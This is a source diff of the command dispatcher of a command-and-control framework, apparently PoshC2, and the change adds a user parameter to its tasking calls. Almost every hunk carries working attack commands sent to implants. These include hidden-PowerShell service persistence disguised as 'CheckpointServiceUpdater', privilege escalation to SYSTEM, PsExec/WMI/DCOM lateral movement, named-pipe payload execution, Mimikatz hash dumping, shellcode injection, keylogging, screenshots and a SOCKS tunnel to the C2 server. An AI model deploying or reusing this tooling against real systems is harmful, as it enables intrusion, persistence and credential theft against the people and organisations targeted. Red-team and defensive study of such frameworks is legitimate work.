           uploads += "%s %s \n" % (hostname[3], filenameuploaded)
-      startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads))
+      startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads))
     if "listmodules" in implant_id.lower():
       mods = ""
       for modname in os.listdir("%s/Modules/" % POSHDIR):
         mods += "%s\r\n" % modname
-      startup(mods)
+      startup(user, mods)
     if "creds" in implant_id.lower():
-      startup("creds module not implemented yet")
+      startup(user, "creds module not implemented yet")
 
     if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"):
       subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
-      startup()
+      startup(user)
 
     if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "):
       alltasks = ""
-      tasks = get_nettasks_all()
+      tasks = get_newtasks_all()
       if tasks is None:
-        startup("No tasks queued!\r\n")
+        startup(user, "No tasks queued!\r\n")
       else:
         for task in tasks:
           imname = get_implantdetails(task[1])
           alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
-        startup("Queued tasks:\r\n\r\n%s" % alltasks)
+        startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
 
     if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
-      drop_nettasks()
+      drop_newtasks()
-      startup("Empty tasks queue\r\n")
+      startup(user, "Empty tasks queue\r\n")
 
     if "quit" in implant_id.lower():
       ri = raw_input("Are you sure you want to quit? (Y/n) ")
       if ri.lower() == "n":
-        startup()
+        startup(user)
       if ri == "":
         sys.exit(0)
       if ri.lower() == "y":
@@ -379,26 +384,26 @@ def startup(printhelp = ""):
       createnewpayload()
 
     if (implant_id == "?") or (implant_id == "help"):
-      startup(pre_help)
+      startup(user, pre_help)
     
     if (implant_id.lower() == "history") or implant_id.lower() == "history ":
-      startup(get_history())
+      startup(user, get_history())
 
     if "use " in implant_id.lower():
       implant_id = implant_id.replace("use ","")
       params = re.compile("use ", re.IGNORECASE)
       implant_id = params.sub("", implant_id)
 
-    commandloop(implant_id)
+    commandloop(implant_id, user)
   except Exception as e:
     if 'unable to open database file' in e:
-      startup()
+      startup(user)
     else:
       traceback.print_exc()
       print ("Error: %s" % e)
       print ("Currently no valid implants: sleeping for 10 seconds")
       time.sleep(10)
-      startup()
+      startup(user)
 
 def runcommand(command, randomuri):
   if command:
@@ -439,12 +444,12 @@ def runcommand(command, randomuri):
 
       sleep = '$sleeptime = %s' % command
       update_sleep(command, randomuri)
-      new_task(sleep, randomuri)
+      new_task(sleep, user, randomuri)
 
     elif (command.lower().startswith('label-implant')):
         label = command.replace('label-implant ', '')
         update_label(label, randomuri)
-        startup()
+        startup(user)
 
     elif "searchhelp" in command.lower():
       searchterm = (command.lower()).replace("searchhelp ","")
@@ -461,7 +466,7 @@ def runcommand(command, randomuri):
       kill_implant(randomuri)
 
     elif command.lower() == 'sai' or command.lower() == 'sai ':
-      new_task('startanotherimplant', randomuri)
+      new_task('startanotherimplant', user, randomuri)
 
     elif "upload-file" in command.lower():
       source = ""
@@ -499,16 +504,16 @@ def runcommand(command, randomuri):
     elif "loadmoduleforce" in command.lower():
       params = re.compile("loadmoduleforce ", re.IGNORECASE)
       params = params.sub("", command)
-      check_module_loaded(params, randomuri, force=True)
+      check_module_loaded(params, randomuri, user, force=True)
 
     elif "loadmodule" in command.lower():
       params = re.compile("loadmodule ", re.IGNORECASE)
       params = params.sub("", command)
-      check_module_loaded(params, randomuri)
+      check_module_loaded(params, randomuri, user)
 
     elif 'get-screenshot' in command.lower():
       taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
-      new_task(taskcmd, randomuri)
+      new_task(taskcmd, user, randomuri)
 
     elif "kill-implant" in command.lower() or "exit" in command.lower():
       impid = get_implantdetails(randomuri)
@@ -517,15 +522,15 @@ def runcommand(command, randomuri):
         print ("Implant not terminated")
       if ri == "":
         pid = get_pid(randomuri)
-        new_task("kill -9 %s" % pid,randomuri)
+        new_task("kill -9 %s" % pid, user, randomuri)
         kill_implant(randomuri)
       if ri.lower() == "y":
         pid = get_pid(randomuri)
-        new_task("kill -9 %s" % pid,randomuri)
+        new_task("kill -9 %s" % pid, user, randomuri)
         kill_implant(randomuri)
 
     elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
-      startup()
+      startup(user)
     
     elif "linuxprivchecker" in command.lower():
       params = re.compile("linuxprivchecker", re.IGNORECASE)
@@ -533,16 +538,16 @@ def runcommand(command, randomuri):
       module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read()
       encoded_module = base64.b64encode(module)
       taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params)
-      new_task(taskcmd, randomuri)
+      new_task(taskcmd, user, randomuri)
 
     else:
       if command:
-        new_task(command, randomuri)
+        new_task(command, user, randomuri)
       return
 
   elif implant_type == "C#":
       try:
-        check_module_loaded("Core.exe", randomuri)
+        check_module_loaded("Core.exe", randomuri, user)
       except Exception as e:
         print ("Error loading Core.exe: %s" % e)
 
@@ -582,7 +587,7 @@ def runcommand(command, randomuri):
             print ("")
             print ("Uploading %s to %s" % (source, destination))
             uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination)
-            new_task(uploadcommand, randomuri)
+            new_task(uploadcommand, user, randomuri)
           else:
             print("Source file could not be read or was empty")
         except Exception as e:
@@ -603,7 +608,7 @@ def runcommand(command, randomuri):
           shellcodefile = load_file(path)
           if shellcodefile != None:
             arch = "64"
-            new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), randomuri)
+            new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
         except Exception as e:
           print ("Error loading file: %s" % e)
 
@@ -613,82 +618,82 @@ def runcommand(command, randomuri):
         if ri.lower() == "n":
           print ("Implant not terminated")
         if ri == "":
-          new_task("exit",randomuri)
+          new_task("exit", user, randomuri)
           kill_implant(randomuri)
         if ri.lower() == "y":
-          new_task("exit",randomuri)
+          new_task("exit",user, randomuri)
           kill_implant(randomuri)
     
       elif "seatbelt " in command.lower():
-        check_module_loaded("Seatbelt.exe", randomuri)
+        check_module_loaded("Seatbelt.exe", randomuri, user)
-        new_task(command,randomuri)
+        new_task(command, user, randomuri)
 
       elif (command.lower().startswith("stop-keystrokes")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
         
       elif (command.lower().startswith("get-keystrokes")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
 
       elif (command.lower().startswith("get-screenshotmulti")):
-        new_task(command,randomuri)
+        new_task(command, user, randomuri)
 
       elif (command.lower().startswith("get-screenshot")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
         
       elif (command.lower().startswith("arpscan")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
   
       elif (command.lower().startswith("testadcredential")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
           
       elif (command.lower().startswith("testlocalcredential")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
 
       elif (command.lower().startswith("turtle")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
         
       elif (command.lower().startswith("get-userinfo")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
                     
       elif (command.lower().startswith("get-content")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
                     
       elif (command.lower().startswith("resolvednsname")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
           
       elif (command.lower().startswith("resolveip")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
                   
       elif (command.lower().startswith("cred-popper")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
 
       elif (command.lower().startswith("get-serviceperms")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
 
       elif (command.lower().startswith("move")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
         
       elif (command.lower().startswith("delete")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
       
       elif (command.lower().startswith("ls")):
-        new_task("run-exe Core.Program Core %s" % command,randomuri)
+        new_task("run-exe Core.Program Core %s" % command, user, randomuri)
                     
       elif (command.lower() == "pwd") or (command.lower() == "pwd "):
-        new_task("run-exe Core.Program Core pwd",randomuri)
+        new_task("run-exe Core.Program Core pwd", user, randomuri)
           
       elif (command.lower() == "ps") or (command.lower() == "ps "):
-        new_task("run-exe Core.Program Core Get-ProcessList",randomuri)
+        new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
 
       elif "loadmoduleforce" in command.lower():
         params = re.compile("loadmoduleforce ", re.IGNORECASE)
         params = params.sub("", command)
-        check_module_loaded(params, randomuri, force=True)
+        check_module_loaded(params, randomuri, user, force=True)
   
       elif "loadmodule" in command.lower():
         params = re.compile("loadmodule ", re.IGNORECASE)
         params = params.sub("", command)
-        check_module_loaded(params, randomuri)
+        check_module_loaded(params, randomuri, user)
 
       elif "listmodules" in command.lower():
         modules = os.listdir("%s/Modules/" % POSHDIR)
@@ -698,7 +703,7 @@ def runcommand(command, randomuri):
         for mod in modules:
           if (".exe" in mod) or (".dll" in mod) :
             print (mod)
-        new_task(command,randomuri)
+        new_task(command, user, randomuri)
   
       elif "modulesloaded" in command.lower():
         ml = get_implantdetails(randomuri)
@@ -708,10 +713,10 @@ def runcommand(command, randomuri):
         print (sharp_help1)
       
       elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
-        startup()
+        startup(user)
         
       elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
-        new_task(command, randomuri)
+        new_task(command, user,  randomuri)
         command = command.replace('set-beacon ', '')
         command = command.replace('setbeacon ', '')
         command = command.replace('beacon ', '')
@@ -720,20 +725,20 @@ def runcommand(command, randomuri):
       elif (command.lower().startswith('label-implant')):
         label = command.replace('label-implant ', '')
         update_label(label, randomuri)
-        startup()
+        startup(user)
             
       else:
         if command:
-          new_task(command, randomuri)
+          new_task(command, user, randomuri)
         return
       
   else:
     try:
-      check_module_loaded("Core.ps1", randomuri)
+      check_module_loaded("Core.ps1", randomuri, user)
     except Exception as e:
       print ("Error loading Core.ps1: %s" % e)
 
-    run_autoloads(command, randomuri)
+    run_autoloads(command, randomuri, user)
 
     # alias mapping
     for alias in ps_alias:
@@ -755,7 +760,7 @@ def runcommand(command, randomuri):
           command = command
 
     if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
-      new_task(command, randomuri)
+      new_task(command, user, randomuri)
       command = command.replace('set-beacon ', '')
       command = command.replace('setbeacon ', '')
       command = command.replace('beacon ', '')
@@ -764,7 +769,7 @@ def runcommand(command, randomuri):
     elif (command.lower().startswith('label-implant')):
         label = command.replace('label-implant ', '')
         update_label(label, randomuri)
-        startup()
+        startup(user)
 
     elif "searchhelp" in command.lower():
       searchterm = (command.lower()).replace("searchhelp ","")
@@ -775,19 +780,19 @@ def runcommand(command, randomuri):
           print (line)
 
     elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
-      startup()
+      startup(user)
 
     elif "install-servicelevel-persistencewithproxy" in command.lower():
       C2 = get_c2server_all()
       if C2[11] == "":
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
       else:
         newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
             C2[13], C2[11], "", "", C2[19], C2[20],
             C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
         payload = newPayload.CreateRawBase()
         cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
 
     elif "install-servicelevel-persistence" in command.lower():
       C2 = get_c2server_all()
@@ -796,30 +801,30 @@ def runcommand(command, randomuri):
           C2[21], get_newimplanturl(), PayloadsDirectory)
       payload = newPayload.CreateRawBase()
       cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
       
     elif "remove-servicelevel-persistence" in command.lower():
-      new_task("sc.exe delete CPUpdater", randomuri)
+      new_task("sc.exe delete CPUpdater", user, randomuri)
 
     # psexec lateral movement
     elif "get-implantworkingdirectory" in command.lower():
-      new_task("pwd", randomuri)
+      new_task("pwd", user, randomuri)
     
     elif "get-system-withproxy" in command.lower():
       C2 = get_c2server_all()
       if C2[11] == "":
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
       else:
         newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
             C2[13], C2[11], "", "", C2[19], C2[20],
             C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
         payload = newPayload.CreateRawBase()
         cmd =  "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
         cmd =  "sc.exe start CPUpdaterMisc"
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
         cmd =  "sc.exe delete CPUpdaterMisc"
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
 
     elif "get-system-withdaisy" in command.lower():
       C2 = get_c2server_all()
@@ -827,11 +832,11 @@ def runcommand(command, randomuri):
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
         cmd =  "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
         cmd =  "sc.exe start CPUpdaterMisc"
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
         cmd =  "sc.exe delete CPUpdaterMisc"
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
 
     elif "get-system" in command.lower():
       C2 = get_c2server_all()
@@ -840,46 +845,46 @@ def runcommand(command, randomuri):
           C2[21], get_newimplanturl(), PayloadsDirectory)
       payload = newPayload.CreateRawBase()
       cmd =  "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
       cmd =  "sc.exe start CPUpdaterMisc"
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
       cmd =  "sc.exe delete CPUpdaterMisc"
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
 
     elif "quit" in command.lower():
       ri = raw_input("Are you sure you want to quit? (Y/n) ")
       if ri.lower() == "n":
-        startup()
+        startup(user)
       if ri == "":
         sys.exit(0)
       if ri.lower() == "y":
         sys.exit(0)
 
     elif "invoke-psexecproxypayload" in command.lower():
-      check_module_loaded("Invoke-PsExec.ps1", randomuri)
+      check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
         with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
         params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
         params = params.sub("", command)
         cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
       else:
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
 
     elif "invoke-psexecdaisypayload" in command.lower():
-      check_module_loaded("Invoke-PsExec.ps1", randomuri)
+      check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
       daisyname = raw_input("Payload name required: ")
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
         params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
         params = params.sub("", command)
         cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
       else:
-        startup("Need to run createdaisypayload first")
+        startup(user, "Need to run createdaisypayload first")
 
     elif "invoke-psexecpayload" in command.lower():
-      check_module_loaded("Invoke-PsExec.ps1", randomuri)
+      check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
       C2 = get_c2server_all()
       newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
           "", "", "", "", C2[19], C2[20],
@@ -888,35 +893,35 @@ def runcommand(command, randomuri):
       params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
       params = params.sub("", command)
       cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
       
     # wmi lateral movement
 
     elif "invoke-wmiproxypayload" in command.lower():
-      check_module_loaded("Invoke-WMIExec.ps1", randomuri)
+      check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
         with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
         params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
         params = params.sub("", command)
         cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
       else:
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
 
     elif "invoke-wmidaisypayload" in command.lower():
-      check_module_loaded("Invoke-WMIExec.ps1", randomuri)
+      check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
       daisyname = raw_input("Name required: ")
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
         params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
         params = params.sub("", command)
         cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
-        new_task(cmd, randomuri)
+        new_task(cmd, user, randomuri)
       else:
-        startup("Need to run createdaisypayload first")
+        startup(user, "Need to run createdaisypayload first")
 
     elif "invoke-wmipayload" in command.lower():
-      check_module_loaded("Invoke-WMIExec.ps1", randomuri)
+      check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
       C2 = get_c2server_all()
       newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
           "", "", "", "", C2[19], C2[20],
@@ -925,7 +930,7 @@ def runcommand(command, randomuri):
       params = re.compile("invoke-wmipayload ", re.IGNORECASE)
       params = params.sub("", command)
       cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
-      new_task(cmd, randomuri)
+      new_task(cmd, user, randomuri)
 
     # dcom lateral movement
 
@@ -937,9 +942,9 @@ def runcommand(command, randomuri):
         p = re.compile(ur'(?<=-target.).*')
         target = re.search(p, command).group()
         pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
-        new_task(pscommand, randomuri)
+        new_task(pscommand, user, randomuri)
       else:
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
 
     elif "invoke-dcomdaisypayload" in command.lower():
       daisyname = raw_input("Name required: ")
@@ -948,9 +953,9 @@ def runcommand(command, randomuri):
         p = re.compile(ur'(?<=-target.).*')
         target = re.search(p, command).group()
         pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
-        new_task(pscommand, randomuri)
+        new_task(pscommand, user, randomuri)
       else:
-        startup("Need to run createdaisypayload first")
+        startup(user, "Need to run createdaisypayload first")
 
     elif "invoke-dcompayload" in command.lower():
       C2 = get_c2server_all()
@@ -961,7 +966,7 @@ def runcommand(command, randomuri):
       p = re.compile(ur'(?<=-target.).*')
       target = re.search(p, command).group()
       pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
-      new_task(pscommand, randomuri)
+      new_task(pscommand, user, randomuri)
 
     # runas payloads
 
@@ -969,44 +974,44 @@ def runcommand(command, randomuri):
       daisyname = raw_input("Name required: ")
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
-        new_task("$proxypayload = \"%s\"" % payload, randomuri)
+        new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
-        check_module_loaded("Invoke-RunAs.ps1", randomuri)
+        check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
-        check_module_loaded("NamedPipeDaisy.ps1", randomuri)
+        check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
         params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
         params = params.sub("", command)
         pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
         pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
-        new_task(pscommand, randomuri)
+        new_task(pscommand, user, randomuri)
       else:
-        startup("Need to run createdaisypayload first")
+        startup(user, "Need to run createdaisypayload first")
 
     elif "invoke-runasproxypayload" in command.lower():
       C2 = get_c2server_all()
       if C2[11] == "":
-        startup("Need to run createproxypayload first")
+        startup(user, "Need to run createproxypayload first")
       else:
         newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
             C2[13], C2[11], "", "", C2[19], C2[20],
             C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
         payload = newPayload.CreateRawBase()
         proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
-        new_task(proxyvar, randomuri)
+        new_task(proxyvar, user, randomuri)
-        check_module_loaded("Invoke-RunAs.ps1", randomuri)
+        check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
-        check_module_loaded("NamedPipeProxy.ps1", randomuri)
+        check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
         params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
         params = params.sub("", command)
         pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
         pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
-        new_task(pscommand, randomuri)
+        new_task(pscommand, user, randomuri)
 
     elif "invoke-runaspayload" in command.lower():
-      check_module_loaded("Invoke-RunAs.ps1", randomuri)
+      check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
-      check_module_loaded("NamedPipe.ps1", randomuri)
+      check_module_loaded("NamedPipe.ps1", randomuri, user)
       params = re.compile("invoke-runaspayload ", re.IGNORECASE)
       params = params.sub("", command)
       pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
       pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
-      new_task(pscommand, randomuri)
+      new_task(pscommand, user, randomuri)
 
     elif command.lower() == "help" or command == "?" or command.lower() == "help ":
       print (posh_help)
@@ -1060,7 +1065,7 @@ def runcommand(command, randomuri):
             uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
           else:
             uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
-          new_task(uploadcommand, randomuri)
+          new_task(uploadcommand, user, randomuri)
         else:
           print("Source file could not be read or was empty")
       except Exception as e:
@@ -1073,10 +1078,10 @@ def runcommand(command, randomuri):
       if ri.lower() == "n":
         print ("Implant not terminated")
       if ri == "":
-        new_task("exit", randomuri)
+        new_task("exit", user, randomuri)
         kill_implant(randomuri)
       if ri.lower() == "y":
-        new_task("exit", randomuri)
+        new_task("exit", user, randomuri)
         kill_implant(randomuri)
 
     elif "unhide-implant" in command.lower():
@@ -1093,24 +1098,24 @@ def runcommand(command, randomuri):
     elif "loadmoduleforce" in command.lower():
       params = re.compile("loadmoduleforce ", re.IGNORECASE)
       params = params.sub("", command)
-      check_module_loaded(params, randomuri, force=True)
+      check_module_loaded(params, randomuri, user, force=True)
 
     elif "loadmodule" in command.lower():
       params = re.compile("loadmodule ", re.IGNORECASE)
       params = params.sub("", command)
-      check_module_loaded(params, randomuri)
+      check_module_loaded(params, randomuri, user)
 
     elif "invoke-daisychain" in command.lower():
-      check_module_loaded("Invoke-DaisyChain.ps1", randomuri)
+      check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
       urls = get_allurls()
-      new_task("%s -URLs '%s'" % (command,urls), randomuri)
+      new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
       print ("Now use createdaisypayload")
 
     elif "inject-shellcode" in command.lower():
     #elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "):
       params = re.compile("inject-shellcode", re.IGNORECASE)
       params = params.sub("", command)
-      check_module_loaded("Inject-Shellcode.ps1", randomuri)
+      check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
       readline.set_completer(filecomplete)
       path = raw_input("Location of shellcode file: ")
       t = tabCompleter()
@@ -1120,8 +1125,8 @@ def runcommand(command, randomuri):
         shellcodefile = load_file(path)
         if shellcodefile != None:
           arch = "64"
-          new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
+          new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
-          new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
+          new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
       except Exception as e:
         print ("Error loading file: %s" % e)
 
@@ -1133,14 +1138,14 @@ def runcommand(command, randomuri):
       print (ml[14])
 
     elif (command.lower() == "ps") or (command.lower() == "ps "):
-      new_task("get-processlist", randomuri)
+      new_task("get-processlist", user, randomuri)
 
     elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
-      check_module_loaded("Invoke-Mimikatz.ps1", randomuri)
+      check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
-      new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", randomuri)
+      new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
 
     elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
-      check_module_loaded("SharpSocks.ps1", randomuri)
+      check_module_loaded("SharpSocks.ps1", randomuri, user)
       import string
       from random import choice
       allchar = string.ascii_letters
@@ -1148,17 +1153,17 @@ def runcommand(command, randomuri):
       sharpkey = gen_key()
       sharpurls = get_sharpurls()
       sharpurl = select_item("HostnameIP", "C2Server")
-      new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), randomuri)
+      new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
       print ("git clone https://github.com/nettitude/SharpSocks.git")
       print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
 
